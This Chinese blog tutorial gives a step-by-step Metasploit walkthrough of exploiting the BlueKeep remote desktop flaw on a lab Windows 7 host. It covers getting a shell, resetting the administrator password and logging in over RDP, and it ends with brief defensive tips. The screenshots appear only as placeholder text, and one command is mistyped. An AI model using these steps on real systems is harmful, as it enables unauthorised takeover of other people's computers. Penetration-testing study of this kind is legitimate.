1. 程式人生 > 實用技巧 >白帽子黑客與網路安全工程師帶你:遠端桌面漏洞利用與Windows7計算機攻防實戰

白帽子黑客與網路安全工程師帶你:遠端桌面漏洞利用與Windows7計算機攻防實戰

一、課前宣告:
1、本分享僅做學習交流,請自覺遵守法律法規!
2、搜尋:Kali 與程式設計,學習更多網路攻防乾貨!
3、Kali 與程式設計每天準時更新,敬請學習和關注!
二、戰略安排
2.1 開啟Metasploit滲透框架,如下如所示。
命令:msfconsole
在這裡插入圖片描述

2.2 檢索有關遠端桌面的已知漏洞,如下圖所示。
命令:search 0708
在這裡插入圖片描述

2.3 使用檢索到的關於遠端桌面的漏洞利用模組,如下圖所示。
命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
在這裡插入圖片描述

2.4 檢視攻擊目標需要設定的引數,如下圖所示。
命令:show targets
在這裡插入圖片描述

2.5 設定相關攻擊引數,如下圖所示。

命令:set rhosts 192.168.0.106
set lhost 192.168.0.102
set target 4
在這裡插入圖片描述
在這裡插入圖片描述

2.6 執行漏洞攻擊模組,如下圖所示。
命令:run
在這裡插入圖片描述
在這裡插入圖片描述

2.7 利用建立起來的會話檢視受害者主機系統的相關資訊,如下圖所示。
命令:sysinfo
在這裡插入圖片描述

2.8 利用建立起來的會話檢視受害者主機系統的相關資訊,如下圖所示。
命令:ipconfig
在這裡插入圖片描述

2.9 檢視會話命令幫助資訊,如下圖所示。
命令:?
在這裡插入圖片描述

2.10 進入受害者主機cmd介面並解決亂碼問題,如下圖所示。
命令:shell
chnp 65001
在這裡插入圖片描述

2.11 利用“whoami”命令檢視相關資訊,如下圖所示。
命令;whoami

在這裡插入圖片描述

2.12 利用cmd命令在受害者主機建立一個新使用者,如下圖所示。
命令:net user administrator 123456
在這裡插入圖片描述

2.13 利用圖形化遠端桌面登入工具登入受害者主機,如下圖所示。
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述

2.14 成功利用圖形化遠端登入工具拿下目標主機,如下圖所示。
在這裡插入圖片描述

2.15 遠端桌面漏洞防護措施,如下圖所示(關閉遠端桌面登入服務、開啟防火牆、安裝第三方電腦管家等等)。
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述

辛苦原創,你的每一次評論點贊和關注,都是我們源源不斷的創作動力哦!你也可搜尋:Kali 與程式設計,學習更多 Kali Linux 滲透與白帽程式設計技巧呢!
點我學習更多Kali Linux滲透測試與網路攻防實戰技巧!